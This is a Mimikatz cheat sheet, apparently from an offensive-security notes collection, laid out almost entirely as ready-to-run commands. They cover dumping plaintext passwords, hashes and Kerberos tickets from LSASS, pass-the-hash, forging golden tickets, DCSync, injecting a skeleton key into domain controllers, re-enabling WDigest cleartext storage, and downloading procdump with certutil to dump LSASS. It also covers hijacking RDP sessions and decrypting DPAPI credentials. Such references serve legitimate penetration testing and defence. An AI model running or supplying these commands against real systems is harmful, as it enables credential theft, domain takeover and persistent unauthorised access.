Mimikatz#

Mimikatz is the leading post-exploitation tool. The operator dumps plaintext passwords, NTLM hashes, PINs, and Kerberos tickets from memory and from on-disk hives.

Quick usage#

mimikatz > log
mimikatz > privilege::debug

sekurlsa#

mimikatz > sekurlsa::logonpasswords
mimikatz > sekurlsa::tickets /export

# pass-the-hash
mimikatz > sekurlsa::pth /user:Administrator /domain:winxp \
    /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd

Kerberos#

mimikatz > kerberos::list /export
mimikatz > kerberos::ptt c:\chocolate.kirbi

# golden ticket
mimikatz > kerberos::golden /admin:administrator /domain:chocolate.local \
    /sid:S-1-5-21-130452501-2365100805-3685010670 \
    /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi

Crypto#

mimikatz > crypto::capi
mimikatz > crypto::cng

mimikatz > crypto::certificates /export
mimikatz > crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE

mimikatz > crypto::keys /export
mimikatz > crypto::keys /machine /export

Vault and LSAdump#

mimikatz > vault::cred
mimikatz > vault::list

mimikatz > token::elevate
mimikatz > vault::cred
mimikatz > vault::list
mimikatz > lsadump::sam
mimikatz > lsadump::secrets
mimikatz > lsadump::cache
mimikatz > token::revert

mimikatz > lsadump::dcsync /user:domain\krbtgt /domain:lab.local

Command reference#

Command

Description

CRYPTO::Certificates

List or export certificates.

KERBEROS::Golden

Create golden / silver / trust tickets.

KERBEROS::List

List user TGT and TGS in memory. No special privileges (only the current user). Similar to klist.

KERBEROS::PTT

Pass the ticket. Inject a stolen or forged ticket.

LSADUMP::DCSync

Ask a DC to synchronize an object (get password data without running code on the DC).

LSADUMP::LSA

Retrieve SAM / AD enterprise. Dumps all AD credentials from a DC or lsass.dmp. Also gets a specific account, like /name:krbtgt.

LSADUMP::SAM

Get the SysKey, decrypt SAM entries from registry or hive. Dumps local accounts.

LSADUMP::Trust

Dump trust keys (passwords) for associated trusts in the domain or forest.

MISC::AddSid

Add to SIDHistory on a user account. Moved to SID::modify since May 2016.

MISC::MemSSP

Inject a malicious Windows SSP to log locally authenticated credentials.

MISC::Skeleton

Inject Skeleton Key into LSASS on a domain controller. Adds a master password while leaving normal passwords intact.

PRIVILEGE::Debug

Get debug rights (required for most Mimikatz commands).

SEKURLSA::Ekeys

List Kerberos encryption keys.

SEKURLSA::Kerberos

List Kerberos credentials for authenticated users (services and computer accounts included).

SEKURLSA::Krbtgt

Get the krbtgt service account password data.

SEKURLSA::LogonPasswords

List available provider credentials (recently logged on users and computer accounts).

SEKURLSA::Pth

Pass-the-hash and over-pass-the-hash.

SEKURLSA::Tickets

List available Kerberos tickets for all recently authenticated users, including services and the local AD computer account. Unlike kerberos::list, sekurlsa uses memory reading and is not subject to key export restrictions.

TOKEN::List

List all tokens on the system.

TOKEN::Elevate

Impersonate a token (elevate to SYSTEM or find a domain admin token).

TOKEN::Elevate /domainadmin

Impersonate a token with Domain Admin credentials.

Mimikatz, execute commands#

Single command.

PS C:\temp\mimikatz> .\mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit

Multiple commands (console).

PS C:\temp\mimikatz> .\mimikatz
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
mimikatz # sekurlsa::wdigest

Extract passwords#

Microsoft disabled lsass clear-text storage from Win8.1 / 2012R2 on. The backport (KB2871997) is also available on Win7 / 8 / 2008R2 / 2012 but clear text is still enabled.

mimikatz_command -f sekurlsa::logonPasswords full
mimikatz_command -f sekurlsa::wdigest

Re-enable wdigest in Windows Server 2012+.

# HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\WDigest
# create a DWORD UseLogonCredential = 1
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest \
    /v UseLogonCredential /t REG_DWORD /f /d 1

Activation conditions, Win7 / 2008R2 / 8 / 2012 / 8.1 / 2012R2 require lock and signout; Win10 requires signout for add and remove; Win2016 requires lock to add and reboot to remove.

Pass-the-hash#

sekurlsa::pth /user:<USER> /domain:<DOMAINFQDN> \
    /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9

sekurlsa::pth /user:<USER> /domain:<DOMAINFQDN> \
    /ntlm:cc36cf7a8514893efccd332446158b1a \
    /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9

Mini dump#

Dump the lsass process.

# HTTP method
certutil -urlcache -split -f http://live.sysinternals.com/procdump.exe C:\Users\Public\procdump.exe
C:\Users\Public\procdump.exe -accepteula -ma lsass.exe lsass.dmp

# SMB method
net use Z: https://live.sysinternals.com
Z:\procdump.exe -accepteula -ma lsass.exe lsass.dmp

Then load into Mimikatz.

mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonPasswords

Golden ticket#

.\mimikatz kerberos::golden /admin:ADMINACCOUNTNAME /domain:DOMAINFQDN \
    /id:ACCOUNTRID /sid:DOMAINSID /krbtgt:KRBTGTPASSWORDHASH /ptt

# Example
.\mimikatz "kerberos::golden /admin:ADMINACCOUNTNAME /domain:DOMAINFQDN \
    /id:9999 /sid:S-1-5-21-135380161-102191138-581311202 \
    /krbtgt:13026055d01f235d67634e109da03321 /startoffset:0 \
    /endin:600 /renewmax:10080 /ptt" exit

Skeleton key#

privilege::debug
misc::skeleton

# map the share
net use p: \\WIN-PTELU2U07KG\admin$ /user:john mimikatz

# login as someone
rdesktop 10.0.0.2:3389 -u test -p mimikatz -d pentestlab

RDP session takeover#

Run tscon.exe as SYSTEM to connect to any session without a password.

privilege::debug
token::elevate
ts::remote /id:2

# session ID to hijack
query user
create sesshijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#55"
net start sesshijack

Credential Manager and DPAPI#

# find credentials
dir C:\Users\<username>\AppData\Local\Microsoft\Credentials\*

# inspect with Mimikatz
$ mimikatz dpapi::cred /in:C:\Users\<username>\AppData\Local\Microsoft\Credentials\2647629F5AA74CD934ECD2F88D64ECD0

# find master key
$ mimikatz !sekurlsa::dpapi

# use master key
$ mimikatz dpapi::cred /in:C:\Users\<username>\AppData\Local\Microsoft\Credentials\2647629F5AA74CD934ECD2F88D64ECD0 \
    /masterkey:95664450d90eb2ce9a8b1933f823b90510b61374180ed50630432739
               40f50e728fe7871169c87a0bba5e0c470d91d21016311727bce2eff9c97445d444b6a17b

References#